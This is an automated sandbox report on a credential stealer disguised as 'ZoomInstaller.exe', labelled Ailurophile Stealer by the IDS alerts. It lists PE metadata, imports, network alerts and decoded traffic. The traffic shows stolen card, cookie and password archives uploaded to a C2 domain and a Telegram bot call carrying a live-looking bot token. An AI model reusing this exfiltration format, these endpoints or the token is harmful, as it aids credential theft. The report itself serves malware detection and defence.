                                                                                /1060x13d20000x300x20040cca7c46fc713b4f088e5d440ca7931False0.103515625data0.8556848540171443IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                /1250x13d30000x30300x3200cdf146190012415e7b1a41f86838392cFalse0.127890625data5.00188009895494IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                /1410x13d70000x17ead20x17ec00fb09a426318d9493dd36d65f9dbaf405False0.42729807927824953data5.452375099590376IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                /1570x15560000x326150x328004f9c42a72c5c1f8cedaa8b20d619e1ddFalse0.5112401376856436data5.516542450471743IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                Resources

                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                RT_ICON0x7ae1300x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 15000 x 15000 px/mEnglishUnited States0.4195590994371482
                                                                                RT_GROUP_ICON0x7af1d80x14dataEnglishUnited States1.1
                                                                                RT_VERSION0x7af1ec0x2dcdataEnglishUnited States0.4931693989071038
                                                                                RT_MANIFEST0x7af4c80x48fXML 1.0 document, ASCII text0.40102827763496146

                                                                                Imports

                                                                                DLLImport
                                                                                KERNEL32.dllAddVectoredContinueHandler, AddVectoredExceptionHandler, AreFileApisANSI, CloseHandle, CreateEventA, CreateFileA, CreateFileMappingA, CreateFileMappingW, CreateFileW, CreateIoCompletionPort, CreateMutexW, CreateThread, CreateWaitableTimerA, CreateWaitableTimerExW, DeleteCriticalSection, DeleteFileA, DeleteFileW, DuplicateHandle, EnterCriticalSection, ExitProcess, FlushFileBuffers, FlushViewOfFile, FormatMessageA, FormatMessageW, FreeEnvironmentStringsW, FreeLibrary, GetConsoleMode, GetCurrentProcessId, GetCurrentThreadId, GetDiskFreeSpaceA, GetDiskFreeSpaceW, GetEnvironmentStringsW, GetErrorMode, GetFileAttributesA, GetFileAttributesExW, GetFileAttributesW, GetFileSize, GetFullPathNameA, GetFullPathNameW, GetLastError, GetProcAddress, GetProcessAffinityMask, GetProcessHeap, GetQueuedCompletionStatusEx, GetStdHandle, GetSystemDirectoryA, GetSystemInfo, GetSystemTime, GetSystemTimeAsFileTime, GetTempPathA, GetTempPathW, GetThreadContext, GetTickCount, GetVersionExA, GetVersionExW, HeapAlloc, HeapCompact, HeapCreate, HeapDestroy, HeapFree, HeapReAlloc, HeapSize, HeapValidate, InitializeCriticalSection, IsDBCSLeadByteEx, LeaveCriticalSection, LoadLibraryA, LoadLibraryExW, LoadLibraryW, LocalFree, LockFile, LockFileEx, MapViewOfFile, MultiByteToWideChar, OutputDebugStringA, OutputDebugStringW, PostQueuedCompletionStatus, QueryPerformanceCounter, RaiseFailFastException, ReadFile, ResumeThread, RtlLookupFunctionEntry, RtlVirtualUnwind, SetConsoleCtrlHandler, SetEndOfFile, SetErrorMode, SetEvent, SetFilePointer, SetProcessPriorityBoost, SetThreadContext, SetUnhandledExceptionFilter, SetWaitableTimer, Sleep, SuspendThread, SwitchToThread, SystemTimeToFileTime, TlsAlloc, TlsGetValue, TryEnterCriticalSection, UnlockFile, UnlockFileEx, UnmapViewOfFile, VirtualAlloc, VirtualFree, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WaitForSingleObjectEx, WerGetFlags, WerSetFlags, WideCharToMultiByte, WriteConsoleW, WriteFile, __C_specific_handler
                                                                                msvcrt.dll___lc_codepage_func, ___mb_cur_max_func, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _beginthread, _beginthreadex, _cexit, _commode, _endthreadex, _errno, _fmode, _initterm, _localtime64, _lock, _unlock, abort, atexit, calloc, exit, fprintf, fputc, free, fwrite, localeconv, malloc, memchr, memcmp, memcpy, memmove, memset, qsort, realloc, signal, strchr, strcmp, strcspn, strerror, strlen, strncmp, strrchr, strspn, vfprintf, wcslen

                                                                                Exports

                                                                                NameOrdinalAddress
                                                                                _cgo_dummy_export10x1407a7fd0
                                                                                authorizerTrampoline20x1402e64b0
                                                                                callbackTrampoline30x1402e6210
                                                                                commitHookTrampoline40x1402e63a0
                                                                                compareTrampoline50x1402e6310
                                                                                doneTrampoline60x1402e62d0
                                                                                preUpdateHookTrampoline70x1402e6530
                                                                                rollbackHookTrampoline80x1402e6400
                                                                                stepTrampoline90x1402e6270
                                                                                updateHookTrampoline100x1402e6440

                                                                                Possible Origin

                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                EnglishUnited States

                                                                                Network Behavior

                                                                                Suricata IDS Alerts

                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                2024-10-29T14:10:15.996082+01002057103ET MALWARE Win32/Ailurophile Stealer CnC Domain in DNS Lookup (manestvli .shop)1192.168.2.6542991.1.1.153UDP
                                                                                2024-10-29T14:10:16.997721+01002057103ET MALWARE Win32/Ailurophile Stealer CnC Domain in DNS Lookup (manestvli .shop)1192.168.2.6542991.1.1.153UDP
                                                                                2024-10-29T14:10:18.734692+01002057104ET MALWARE Observed Win32/Ailurophile Stealer Domain (manestvli .shop) in TLS SNI1192.168.2.649970188.114.97.3443TCP

                                                                                Network Port Distribution

                                                                                TCP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Oct 29, 2024 14:09:14.401094913 CET49709443192.168.2.6104.26.9.59
                                                                                Oct 29, 2024 14:09:14.401135921 CET44349709104.26.9.59192.168.2.6
                                                                                Oct 29, 2024 14:09:14.401263952 CET49709443192.168.2.6104.26.9.59
                                                                                Oct 29, 2024 14:09:14.402508020 CET49709443192.168.2.6104.26.9.59
                                                                                Oct 29, 2024 14:09:14.402523041 CET44349709104.26.9.59192.168.2.6
                                                                                Oct 29, 2024 14:09:15.124979973 CET44349709104.26.9.59192.168.2.6
                                                                                Oct 29, 2024 14:09:15.125287056 CET49709443192.168.2.6104.26.9.59
                                                                                Oct 29, 2024 14:09:15.125302076 CET44349709104.26.9.59192.168.2.6
                                                                                Oct 29, 2024 14:09:15.125514984 CET49709443192.168.2.6104.26.9.59
                                                                                Oct 29, 2024 14:09:15.125520945 CET44349709104.26.9.59192.168.2.6
                                                                                Oct 29, 2024 14:09:15.126673937 CET44349709104.26.9.59192.168.2.6
                                                                                Oct 29, 2024 14:09:15.126761913 CET49709443192.168.2.6104.26.9.59
                                                                                Oct 29, 2024 14:09:15.177923918 CET49709443192.168.2.6104.26.9.59
                                                                                Oct 29, 2024 14:09:15.178033113 CET44349709104.26.9.59192.168.2.6
                                                                                Oct 29, 2024 14:09:15.178119898 CET49709443192.168.2.6104.26.9.59
                                                                                Oct 29, 2024 14:09:15.219337940 CET44349709104.26.9.59192.168.2.6
                                                                                Oct 29, 2024 14:09:15.225816011 CET49709443192.168.2.6104.26.9.59
                                                                                Oct 29, 2024 14:09:15.225827932 CET44349709104.26.9.59192.168.2.6
                                                                                Oct 29, 2024 14:09:15.279331923 CET49709443192.168.2.6104.26.9.59
                                                                                Oct 29, 2024 14:09:15.365617037 CET44349709104.26.9.59192.168.2.6
                                                                                Oct 29, 2024 14:09:15.365710020 CET44349709104.26.9.59192.168.2.6
                                                                                Oct 29, 2024 14:09:15.365758896 CET49709443192.168.2.6104.26.9.59
                                                                                Oct 29, 2024 14:09:15.366204023 CET49709443192.168.2.6104.26.9.59
                                                                                Oct 29, 2024 14:09:15.366225958 CET44349709104.26.9.59192.168.2.6
                                                                                Oct 29, 2024 14:09:15.366282940 CET49709443192.168.2.6104.26.9.59
                                                                                Oct 29, 2024 14:09:15.366288900 CET44349709104.26.9.59192.168.2.6
                                                                                Oct 29, 2024 14:10:17.148538113 CET49970443192.168.2.6188.114.97.3
                                                                                Oct 29, 2024 14:10:17.148583889 CET44349970188.114.97.3192.168.2.6
                                                                                Oct 29, 2024 14:10:17.148694992 CET49970443192.168.2.6188.114.97.3
                                                                                Oct 29, 2024 14:10:17.149060011 CET49970443192.168.2.6188.114.97.3
                                                                                Oct 29, 2024 14:10:17.149075031 CET44349970188.114.97.3192.168.2.6
                                                                                Oct 29, 2024 14:10:18.734431982 CET44349970188.114.97.3192.168.2.6
                                                                                Oct 29, 2024 14:10:18.734692097 CET49970443192.168.2.6188.114.97.3
                                                                                Oct 29, 2024 14:10:18.734710932 CET44349970188.114.97.3192.168.2.6
                                                                                Oct 29, 2024 14:10:18.734834909 CET49970443192.168.2.6188.114.97.3
                                                                                Oct 29, 2024 14:10:18.734842062 CET44349970188.114.97.3192.168.2.6
                                                                                Oct 29, 2024 14:10:18.735889912 CET44349970188.114.97.3192.168.2.6
                                                                                Oct 29, 2024 14:10:18.735969067 CET49970443192.168.2.6188.114.97.3
                                                                                Oct 29, 2024 14:10:18.756350994 CET49970443192.168.2.6188.114.97.3
                                                                                Oct 29, 2024 14:10:18.756575108 CET49970443192.168.2.6188.114.97.3
                                                                                Oct 29, 2024 14:10:18.756576061 CET44349970188.114.97.3192.168.2.6
                                                                                Oct 29, 2024 14:10:18.756604910 CET49970443192.168.2.6188.114.97.3
                                                                                Oct 29, 2024 14:10:18.756647110 CET49970443192.168.2.6188.114.97.3
                                                                                Oct 29, 2024 14:10:18.756661892 CET44349970188.114.97.3192.168.2.6
                                                                                Oct 29, 2024 14:10:18.756680965 CET49970443192.168.2.6188.114.97.3
                                                                                Oct 29, 2024 14:10:18.799355984 CET44349970188.114.97.3192.168.2.6
                                                                                Oct 29, 2024 14:10:18.804900885 CET49970443192.168.2.6188.114.97.3
                                                                                Oct 29, 2024 14:10:19.408775091 CET44349970188.114.97.3192.168.2.6
                                                                                Oct 29, 2024 14:10:19.408910990 CET44349970188.114.97.3192.168.2.6
                                                                                Oct 29, 2024 14:10:19.408991098 CET49970443192.168.2.6188.114.97.3
                                                                                Oct 29, 2024 14:10:19.409240007 CET49970443192.168.2.6188.114.97.3
                                                                                Oct 29, 2024 14:10:19.409267902 CET44349970188.114.97.3192.168.2.6
                                                                                Oct 29, 2024 14:10:19.409287930 CET49970443192.168.2.6188.114.97.3
                                                                                Oct 29, 2024 14:10:19.409297943 CET44349970188.114.97.3192.168.2.6
                                                                                Oct 29, 2024 14:10:19.418932915 CET49980443192.168.2.6149.154.167.220
                                                                                Oct 29, 2024 14:10:19.419020891 CET44349980149.154.167.220192.168.2.6
                                                                                Oct 29, 2024 14:10:19.419105053 CET49980443192.168.2.6149.154.167.220
                                                                                Oct 29, 2024 14:10:19.419447899 CET49980443192.168.2.6149.154.167.220
                                                                                Oct 29, 2024 14:10:19.419467926 CET44349980149.154.167.220192.168.2.6
                                                                                Oct 29, 2024 14:10:20.453824997 CET44349980149.154.167.220192.168.2.6
                                                                                Oct 29, 2024 14:10:20.454055071 CET49980443192.168.2.6149.154.167.220
                                                                                Oct 29, 2024 14:10:20.454099894 CET44349980149.154.167.220192.168.2.6
                                                                                Oct 29, 2024 14:10:20.454171896 CET49980443192.168.2.6149.154.167.220
                                                                                Oct 29, 2024 14:10:20.454180002 CET44349980149.154.167.220192.168.2.6
                                                                                Oct 29, 2024 14:10:20.455213070 CET44349980149.154.167.220192.168.2.6
                                                                                Oct 29, 2024 14:10:20.455280066 CET49980443192.168.2.6149.154.167.220
                                                                                Oct 29, 2024 14:10:20.456088066 CET49980443192.168.2.6149.154.167.220
                                                                                Oct 29, 2024 14:10:20.456161976 CET44349980149.154.167.220192.168.2.6
                                                                                Oct 29, 2024 14:10:20.456269979 CET49980443192.168.2.6149.154.167.220
                                                                                Oct 29, 2024 14:10:20.456286907 CET44349980149.154.167.220192.168.2.6
                                                                                Oct 29, 2024 14:10:20.456310987 CET49980443192.168.2.6149.154.167.220
                                                                                Oct 29, 2024 14:10:20.499382973 CET44349980149.154.167.220192.168.2.6
                                                                                Oct 29, 2024 14:10:20.503779888 CET49980443192.168.2.6149.154.167.220
                                                                                Oct 29, 2024 14:10:20.734303951 CET44349980149.154.167.220192.168.2.6
                                                                                Oct 29, 2024 14:10:20.734328985 CET44349980149.154.167.220192.168.2.6
                                                                                Oct 29, 2024 14:10:20.734451056 CET49980443192.168.2.6149.154.167.220
                                                                                Oct 29, 2024 14:10:20.734491110 CET44349980149.154.167.220192.168.2.6
                                                                                Oct 29, 2024 14:10:20.734764099 CET49980443192.168.2.6149.154.167.220
                                                                                Oct 29, 2024 14:10:20.734791994 CET44349980149.154.167.220192.168.2.6
                                                                                Oct 29, 2024 14:10:20.734807014 CET49980443192.168.2.6149.154.167.220
                                                                                Oct 29, 2024 14:10:20.734982967 CET44349980149.154.167.220192.168.2.6
                                                                                Oct 29, 2024 14:10:20.735025883 CET44349980149.154.167.220192.168.2.6
                                                                                Oct 29, 2024 14:10:20.735035896 CET49980443192.168.2.6149.154.167.220
                                                                                Oct 29, 2024 14:10:20.735095024 CET49980443192.168.2.6149.154.167.220

                                                                                UDP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Oct 29, 2024 14:09:14.389560938 CET5914053192.168.2.61.1.1.1
                                                                                Oct 29, 2024 14:09:14.397434950 CET53591401.1.1.1192.168.2.6
                                                                                Oct 29, 2024 14:10:15.996082067 CET5429953192.168.2.61.1.1.1
                                                                                Oct 29, 2024 14:10:16.997720957 CET5429953192.168.2.61.1.1.1
                                                                                Oct 29, 2024 14:10:17.147002935 CET53542991.1.1.1192.168.2.6
                                                                                Oct 29, 2024 14:10:17.150201082 CET53542991.1.1.1192.168.2.6
                                                                                Oct 29, 2024 14:10:19.410284042 CET5836053192.168.2.61.1.1.1
                                                                                Oct 29, 2024 14:10:19.417773008 CET53583601.1.1.1192.168.2.6

                                                                                DNS Queries

                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Oct 29, 2024 14:09:14.389560938 CET192.168.2.61.1.1.10x892bStandard query (0)api.myip.comA (IP address)IN (0x0001)false
                                                                                Oct 29, 2024 14:10:15.996082067 CET192.168.2.61.1.1.10x4eb4Standard query (0)manestvli.shopA (IP address)IN (0x0001)false
                                                                                Oct 29, 2024 14:10:16.997720957 CET192.168.2.61.1.1.10x4eb4Standard query (0)manestvli.shopA (IP address)IN (0x0001)false
                                                                                Oct 29, 2024 14:10:19.410284042 CET192.168.2.61.1.1.10xfcebStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                DNS Answers

                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Oct 29, 2024 14:09:14.397434950 CET1.1.1.1192.168.2.60x892bNo error (0)api.myip.com104.26.9.59A (IP address)IN (0x0001)false
                                                                                Oct 29, 2024 14:09:14.397434950 CET1.1.1.1192.168.2.60x892bNo error (0)api.myip.com104.26.8.59A (IP address)IN (0x0001)false
                                                                                Oct 29, 2024 14:09:14.397434950 CET1.1.1.1192.168.2.60x892bNo error (0)api.myip.com172.67.75.163A (IP address)IN (0x0001)false
                                                                                Oct 29, 2024 14:10:17.147002935 CET1.1.1.1192.168.2.60x4eb4No error (0)manestvli.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                                Oct 29, 2024 14:10:17.147002935 CET1.1.1.1192.168.2.60x4eb4No error (0)manestvli.shop188.114.96.3A (IP address)IN (0x0001)false
                                                                                Oct 29, 2024 14:10:17.150201082 CET1.1.1.1192.168.2.60x4eb4No error (0)manestvli.shop188.114.96.3A (IP address)IN (0x0001)false
                                                                                Oct 29, 2024 14:10:17.150201082 CET1.1.1.1192.168.2.60x4eb4No error (0)manestvli.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                                Oct 29, 2024 14:10:19.417773008 CET1.1.1.1192.168.2.60xfcebNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                HTTP Request Dependency Graph

                                                                                • api.myip.com
                                                                                • manestvli.shop
                                                                                • api.telegram.org

                                                                                HTTPS Proxied Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.649709104.26.9.594435368C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-29 13:09:15 UTC93OUTGET / HTTP/1.1
                                                                                Host: api.myip.com
                                                                                User-Agent: Go-http-client/1.1
                                                                                Accept-Encoding: gzip
                                                                                2024-10-29 13:09:15 UTC567INHTTP/1.1 200 OK
                                                                                Date: Tue, 29 Oct 2024 13:09:15 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                vary: Accept-Encoding
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6DsXUbkQhLdQbSQg%2F43oGhlINsJGSaJ07uP8TdOq%2FPDSy%2Fevov9%2BoVq55IAIylnKOtGfB2EK5wFwQBspzJMKJJA14C8gc97hdDyaz9mjVi0ONXo3GifYYxTTi6LzZA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8da366224b993590-DFW
                                                                                2024-10-29 13:09:15 UTC65INData Raw: 33 62 0d 0a 7b 22 69 70 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 63 22 3a 22 55 53 22 7d 0d 0a
                                                                                Data Ascii: 3b{"ip":"173.254.250.72","country":"United States","cc":"US"}
                                                                                2024-10-29 13:09:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.2.649970188.114.97.34435368C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-29 13:10:18 UTC810OUTPOST /upload.php?data=bDkyQVpaZGp1YXE2bU0raWZhUFJtWUNJaGQxN3phMmRsWGljcThhdG1KK1drTGVaZ3AxOTRJRGVqMlNEZGJDYXJxbXRwNWQ4cTJaOG5ubVpmOTFxcllLRnRLYXYwTGl1Z0tQRnFYeWRxOCtXcktLcmpvU3NaNnZSbEtlTmJLeW1sbVp0MDVhbmVJeVZpSmljeEpuSHNYMTlwNmQ4ZW5iZmxOMTNySUYwbDZpdTBLaHNnWDJ6WVh5ZHE4K1ZxM3l1bDJUSHA4WFR0YkY5bzlHWmdIZDkyWHZSaEtxV1k5ZWh2TDZ3b0lPaXE2bDhuYXZQaTd5TVpKWmp2YUhFcmR1eGZhUFJtWUNIZmRsNzBZU2NsNTYxcTZ2UTBxQ0JmS3VqZktHTzFwU3JqSzU5bTlLYXI2bXNxbjJtc0thWGkybVdsZEtobllPYXJZZkUwODluanBDemw0aG5oczZXcTR5dWZacmFtc2FZcWFxV2dMaGdmSjZqejMrM2Y2ZDluc3VoeFptMXJaZW56Wm1DblgzZGU5Sm1jUT09&hash=2d6441c1bfc749b0344f HTTP/1.1
                                                                                Host: manestvli.shop
                                                                                User-Agent: Go-http-client/1.1
                                                                                Content-Length: 3788
                                                                                Content-Type: multipart/form-data; boundary=2936f3dac7c8181cd97977433163a9cd10ed18c947a33702af6c7d74091c
                                                                                Accept-Encoding: gzip
                                                                                2024-10-29 13:10:18 UTC376OUTData Raw: 2d 2d 32 39 33 36 66 33 64 61 63 37 63 38 31 38 31 63 64 39 37 39 37 37 34 33 33 31 36 33 61 39 63 64 31 30 65 64 31 38 63 39 34 37 61 33 33 37 30 32 61 66 36 63 37 64 37 34 30 39 31 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 41 69 6c 75 72 6f 70 68 69 6c 65 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 50 4b 03 04 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 00 00 41 69 6c 75 72 6f 70 68 69 6c 65 2f 50 4b 03 04 14 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 16 00 00 00 41 69 6c 75
                                                                                Data Ascii: --2936f3dac7c8181cd97977433163a9cd10ed18c947a33702af6c7d74091cContent-Disposition: form-data; name="file"; filename="Ailurophile.zip"Content-Type: application/octet-streamPKAilurophile/PKAilu
                                                                                2024-10-29 13:10:18 UTC2372OUTData Raw: c5 e5 97 af 90 58 5a 92 9f 96 99 93 53 ac 90 96 5f 9a 97 a2 90 96 5f a4 e0 9e 9f 9f 9e 93 aa e0 92 9a 96 58 9a 53 c2 05 08 00 00 ff ff 50 4b 07 08 47 88 f4 14 53 00 00 00 56 00 00 00 50 4b 03 04 14 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 41 69 6c 75 72 6f 70 68 69 6c 65 5c 43 61 72 64 73 2f 50 4b 03 04 14 00 08 08 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 00 00 00 41 69 6c 75 72 6f 70 68 69 6c 65 5c 43 61 72 64 73 5c 43 61 72 64 73 2e 74 78 74 72 cc cc 29 2d ca 2f c8 c8 cc 49 55 08 2e 49 4d cc 49 2d 52 d0 55 08 49 cd 49 4d 2f 4a cc b5 52 70 40 52 50 96 c7 c5 e5 97 af 90 9c 58 94 52 ac 90 96 5f 9a 97 02 08 00 00 ff ff 50 4b 07 08 9d 40 e3 60 3b 00 00 00 3e 00 00 00 50 4b 03 04 14 00 00 08 00 00 00 00 00 00
                                                                                Data Ascii: XZS__XSPKGSVPKAilurophile\Cards/PKAilurophile\Cards\Cards.txtr)-/IU.IMI-RUIIM/JRp@RPXR_PK@`;>PK
                                                                                2024-10-29 13:10:18 UTC538OUTData Raw: 00 00 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 00 00 02 01 00 00 41 69 6c 75 72 6f 70 68 69 6c 65 5c 43 61 72 64 73 2f 50 4b 01 02 14 00 14 00 08 08 08 00 00 00 00 00 9d 40 e3 60 3b 00 00 00 3e 00 00 00 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 32 01 00 00 41 69 6c 75 72 6f 70 68 69 6c 65 5c 43 61 72 64 73 5c 43 61 72 64 73 2e 74 78 74 50 4b 01 02 14 00 14 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 b6 01 00 00 41 69 6c 75 72 6f 70 68 69 6c 65 5c 43 6f 6f 6b 69 65 73 2f 50 4b 01 02 14 00 14 00 08 08 08 00 00 00 00 00 db 86 41 a3 03 01 00 00 43 01 00 00 26 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 01 00 00 41 69 6c 75 72 6f 70 68 69 6c 65 5c 43 6f 6f 6b 69 65 73 5c 47 6f 6f 67 6c 65 5f 44 65
                                                                                Data Ascii: Ailurophile\Cards/PK@`;>2Ailurophile\Cards\Cards.txtPKAilurophile\Cookies/PKAC&Ailurophile\Cookies\Google_De
                                                                                2024-10-29 13:10:18 UTC502OUTData Raw: 00 00 00 00 00 9a 04 00 00 41 69 6c 75 72 6f 70 68 69 6c 65 5c 50 61 73 73 77 6f 72 64 73 2f 50 4b 01 02 14 00 14 00 08 08 08 00 00 00 00 00 56 91 d4 6f 3e 00 00 00 41 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 ce 04 00 00 41 69 6c 75 72 6f 70 68 69 6c 65 5c 50 61 73 73 77 6f 72 64 73 5c 47 6f 6f 67 6c 65 2d 44 65 66 61 75 6c 74 2e 74 78 74 50 4b 01 02 14 00 14 00 08 08 08 00 00 00 00 00 56 91 d4 6f 3e 00 00 00 41 00 00 00 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 62 05 00 00 41 69 6c 75 72 6f 70 68 69 6c 65 5c 50 61 73 73 77 6f 72 64 73 5c 4d 69 63 72 6f 73 6f 66 74 2d 44 65 66 61 75 6c 74 2e 74 78 74 50 4b 01 02 14 00 14 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 f9 05 00 00 41 69 6c
                                                                                Data Ascii: Ailurophile\Passwords/PKVo>A(Ailurophile\Passwords\Google-Default.txtPKVo>A+bAilurophile\Passwords\Microsoft-Default.txtPKAil
                                                                                2024-10-29 13:10:19 UTC797INHTTP/1.1 200 OK
                                                                                Date: Tue, 29 Oct 2024 13:10:19 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                X-Powered-By: PHP/8.0.30
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NPpJhjrasbABXXRgFbTnhUrJwJQ8kaRceba3Q%2B2KCFLj6jVJoDckxUcFqF%2FEOVdkKsZyt9UO%2FmRJaMGBhUxYyPhN3L%2FBUEBt8sNub1pio30Rg3rp55olBWi4AcCs%2FLxmaA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8da367afa973e7aa-DFW
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1137&sent=6&recv=10&lost=0&retrans=0&sent_bytes=2834&recv_bytes=5301&delivery_rate=2500863&cwnd=249&unsent_bytes=0&cid=96264c290712b47d&ts=1658&x=0"
                                                                                2024-10-29 13:10:19 UTC572INData Raw: 32 65 30 0d 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 66 69 6c 65 5f 70 75 74 5f 63 6f 6e 74 65 6e 74 73 28 68 65 72 61 73 76 6e 78 61 69 6c 75 72 6f 70 68 69 6c 65 2f 41 69 6c 75 72 6f 70 68 69 6c 65 5f 36 37 32 30 64 65 62 62 33 38 36 37 36 35 2e 38 30 36 37 32 34 38 36 2e 7a 69 70 2f 6c 6f 67 2e 74 78 74 29 3a 20 46 61 69 6c 65 64 20 74 6f 20 6f 70 65 6e 20 73 74 72 65 61 6d 3a 20 4e 6f 20 73 75 63 68 20 66 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 69 6e 20 3c 62 3e 43 3a 5c 78 61 6d 70 70 5c 68 74 64 6f 63 73 5c 75 70 6c 6f 61 64 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 34 32 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 66 69 6c 65
                                                                                Data Ascii: 2e0<br /><b>Warning</b>: file_put_contents(herasvnxailurophile/Ailurophile_6720debb386765.80672486.zip/log.txt): Failed to open stream: No such file or directory in <b>C:\xampp\htdocs\upload.php</b> on line <b>42</b><br /><br /><b>Warning</b>: file
                                                                                2024-10-29 13:10:19 UTC171INData Raw: 70 65 6e 20 73 74 72 65 61 6d 3a 20 4e 6f 20 73 75 63 68 20 66 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 69 6e 20 3c 62 3e 43 3a 5c 78 61 6d 70 70 5c 68 74 64 6f 63 73 5c 75 70 6c 6f 61 64 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 34 32 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 46 69 6c 65 20 75 70 6c 6f 61 64 65 64 20 61 6e 64 20 73 61 76 65 64 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 7d 0d 0a
                                                                                Data Ascii: pen stream: No such file or directory in <b>C:\xampp\htdocs\upload.php</b> on line <b>42</b><br />{"status":"success","message":"File uploaded and saved successfully."}
                                                                                2024-10-29 13:10:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                2192.168.2.649980149.154.167.2204435368C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-29 13:10:20 UTC230OUTPOST /bot7576282251:AAG0mg-rIFL8SDgfm15Nk4l51UZeLB-cEwU/sendMessage HTTP/1.1
                                                                                Host: api.telegram.org
                                                                                User-Agent: Go-http-client/1.1
                                                                                Content-Length: 1732
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Accept-Encoding: gzip
